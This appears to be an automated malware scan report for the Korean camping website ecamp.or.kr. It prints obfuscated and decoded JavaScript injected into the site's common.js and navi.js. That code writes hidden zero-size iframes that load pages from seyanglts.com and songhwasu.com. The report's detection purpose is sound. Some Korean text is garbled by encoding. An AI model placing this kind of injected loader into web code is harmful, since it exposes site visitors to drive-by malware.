Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecamp.or.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.ecamp.or.kr/ | 200 OK Content-Length: 61504 Content-Type: text/html | clean |
http://www.ecamp.or.kr/common_/lib/common.js | 200 OK Content-Length: 578 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _$=['\x78\x69\x61\x6f\x3d','\x78\x69\x61\x6f\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x79\x61\x6e\x67\x6c\x74\x73\x2e\x63\x6f\x6d\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])} Decoded script: <iframe src=http://seyanglts.com/index.html width=0 height=0></iframe> Antivirus reports:
| ||
http://www.ecamp.or.kr/common_/lib/navi.js | 200 OK Content-Length: 2768 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: songhwasu.com function toggle_gnbover( idx ) { var obj; for (var z=1; z<9; z++){ obj = document.getElementById('gmsub_20' + z); if (z == idx){ obj.style.display="block"; } else { obj.style.display="none"; } } onGnb(idx); return; } function setMenu(idx) { for ( mg=1; mg <= 8; mg++ ) { if ( idx != mg ) { ...[2700 bytes skipped]... Decoded script: if(document.cookie.indexOf('xiao=')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='xiao=Yes;path=/;expires='+expires.toGMTString();document.write("<iframe src=http://songhwasu.com/swf\index.html width=0 height=0></iframe>")} if(document.cookie.indexOf('xiao=')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='xiao=Yes;path=/;expires='+expires.toGMTString();document.write("<iframe src=http://songhwasu.com/swf\index.html width=0 height=0></iframe>")} <iframe src=http://songhwasu.com/swfindex.html width=0 height=0></iframe> | ||
http://www.ecamp.or.kr/common_/lib/script.js | 200 OK Content-Length: 4839 Content-Type: application/x-javascript | clean |
http://www.ecamp.or.kr/common_/lib/tab.js | 200 OK Content-Length: 3840 Content-Type: application/x-javascript | clean |
http://www.ecamp.or.kr/common_/lib/selectmenu.js | 200 OK Content-Length: 7109 Content-Type: application/x-javascript | clean |
http://www.ecamp.or.kr/member/join_agree.asp | 200 OK Content-Length: 71126 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.camp.or.kr ...[56123 bytes skipped]...  ´ÙÀ½°ú °°½À´Ï´Ù. - »çÀÌÆ® : ȸ»ç°¡ ÀçÈ ¡¤ ¿ë¿ª ¡¤ Á¤º¸¸¦ ÀÌ¿ëÀÚ¿¡°Ô Á¦°øÇϱâ À§ÇÏ¿© ÄÄÇ»ÅÍ µî Á¤º¸Åë½Å ¼³ºñ¸¦ ÀÌ¿ëÇÏ¿© ÀçÈ ¡¤ ¿ë¿ªÀ» °Å·¡ÇÒ ¼ö ÀÖµµ·Ï ¼³Á¤ÇÑ °¡»óÀÇ ¿µ¾÷Àå ¶Ç´Â È¸»ç°¡ ¿î¿µÇÏ´Â À¥»çÀÌÆ®¸¦ ¸»Çϸç, ÅëÇÕµÈ ÇϳªÀÇ ¾ÆÀ̵ð ¹× ºñ¹Ð¹øÈ£¸¦ ÀÌ¿ëÇÏ¿© ¼ºñ½º¸¦ Á¦°ø¹ÞÀ» ¼ö ÀÖ´Â ¾Æ·¡ÀÇ »çÀÌÆ®¸¦ ÀǹÌÇÕ´Ï´Ù. ¾Æ¿ï·¯ »çÀÌÆ®¸¦ ¿î¿µÇÏ´Â »ç¾÷ÀÚÀÇ Àǹ̷εµ »ç¿ëÇÕ´Ï´Ù. ¡Ø»çÀÌÆ® ÇöȲ (2010³â 5¿ù ÇöÀç) Ä·ÇÁ³ª¶ó(www.camp.or.kr / www.campnara.net) | ³ªµéÀÌ (www.nadri.or.kr) | E_camp (www.ecamp.or.kr) | ¼ºê ¿î¿µ Ä«Æä µî - ȸ»ç Æйи® »çÀÌÆ® : ȸ»ç¿¡ ȸ¿ø µî·ÏÇÑ ÀÌ¿ëÀÚ°¡ ´Ù¾çÇÑ Á¤º¸¿Í ¼ºñ½º¸¦ Á¦°ø¹ÞÀ» ¼ö ÀÖµµ·Ï ȸ»ç°¡ Á¦ÀÛ, ¿î¿µÇÏ´Â ÀÎÅÍ³Ý »çÀÌÆ®¸¦ ÀǹÌÇÕ´Ï´Ù. - ȸ»ç Æйи® ȸ¿ø : ȸ»ç¿¡ °³ÀÎÁ¤º¸¸¦ Á¦°øÇÏ¿© ȸ¿øµî·ÏÀ» ÇÏ°í, ȸ¿ø ¾ÆÀ̵𸦠ºÎ¿© ¹ÞÀº ÀÚ ¶Ç´Â ±× ȸ¿øÀüü¸¦ ÀǹÌÇϸç, ȸ¿øµî·Ï ½Ã ºÎ¿© ¹ÞÀº ¾ÆÀ̵ð·Î ȸ»ç Æйи® »çÀÌÆ®¿¡ ÀÚÀ¯·Ó°Ô Á¢¼ÓÇÒ ¼ö ÀÖÀ¸¸ç, ¾î´À ÇÑ °÷¿¡ Á¢¼Ó(Log-in)ÇÏ ...[29597 bytes skipped]... | ||
http://www.ecamp.or.kr/common/js/common.js | 200 OK Content-Length: 53383 Content-Type: application/x-javascript | clean |
http://www.ecamp.or.kr/member/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
http://www.ecamp.or.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.ecamp.or.kr/reservation/quick_reservation_local.asp | 200 OK Content-Length: 53252 Content-Type: text/html | clean |
http://211.110.250.9/TicketNara/MainPayFx/Flash/Kor/js/MainPayPlugin.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.ecamp.or.kr/campnara/campnara.asp | 200 OK Content-Length: 59616 Content-Type: text/html | clean |
http://www.ecamp.or.kr/campnara/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
http://www.ecamp.or.kr/campnara/campnara_01_list.asp?genre=1 | 200 OK Content-Length: 57856 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecamp.or.kr
Result:
GET / HTTP/1.1
Host: ecamp.or.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecamp.or.kr
Referer: http://www.google.com/search?q=ecamp.or.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecamp.or.kr
Referer: http://www.google.com/search?q=ecamp.or.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.